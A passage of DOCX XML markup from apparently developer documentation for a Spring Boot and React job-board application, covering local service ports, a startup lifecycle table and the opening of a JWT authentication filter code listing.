          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Health / Verification Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Boot Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>default (dev)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>~320 MB JVM Heap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>http://localhost:8080/swagger-ui/index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vite / React Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5173</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>~85 MB Node RSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>http://localhost:5173</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2 Database Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>in-memory (mem:jobboard_db)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Embedded in JVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>http://localhost:8080/h2-console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>19.1 Step-by-Step Startup Lifecycle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4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Startup Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Operational Event &amp; System Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 1: Prerequisites Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Verify Java JDK 21+ and Node.js 18+ are present in the environment system PATH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 2: Dependency Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Maven compiles dependencies from pom.xml into target/; npm install resolves frontend node_modules/.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 3: Database Bootstrap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Boot launches embedded H2 datasource at jdbc:h2:mem:jobboard_db with sa credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 4: Schema DDL Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hibernate parses @Entity annotations and generates relational tables (users, jobs, applications, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 5: Data Seeding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DataInitializer (CommandLineRunner) executes, creating default roles, users, companies, jobs, and skills.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 6: Security Filter Chain Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SecurityConfig registers OncePerRequestFilter and CORS configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 7: Frontend Server Launch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vite starts local development server on http://localhost:5173 with HMR enabled.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Step 8: Network Connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Axios client in browser communicates with http://localhost:8080/api using Bearer JWT tokens.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>20. Code-Level Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Let us inspect the foundational classes that control security, business logic, and data flow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>20.1 Security Filter Chain: JwtAuthenticationFilter.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>This custom filter extends OncePerRequestFilter, ensuring it executes exactly once per incoming HTTP request. It extracts the Authorization header, validates the Bearer prefix, parses the JWT claims via JwtUtil, and sets the Spring SecurityContextHolder authentication token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: JwtAuthenticationFilter.java - Filter Implementation</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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@Component</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>public class JwtAuthenticationFilter extends OncePerRequestFilter {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    @Autowired private JwtUtil jwtUtil;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    @Autowired private CustomUserDetailsService userDetailsService;</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 xml:space="preserve">    @Override</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                    FilterChain filterChain) throws ServletException, IOException {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        final String authHeader = request.getHeader("Authorization");</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        String username = null;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        String jwt = null;</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 xml:space="preserve">        if (authHeader != null &amp;&amp; authHeader.startsWith("Bearer ")) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
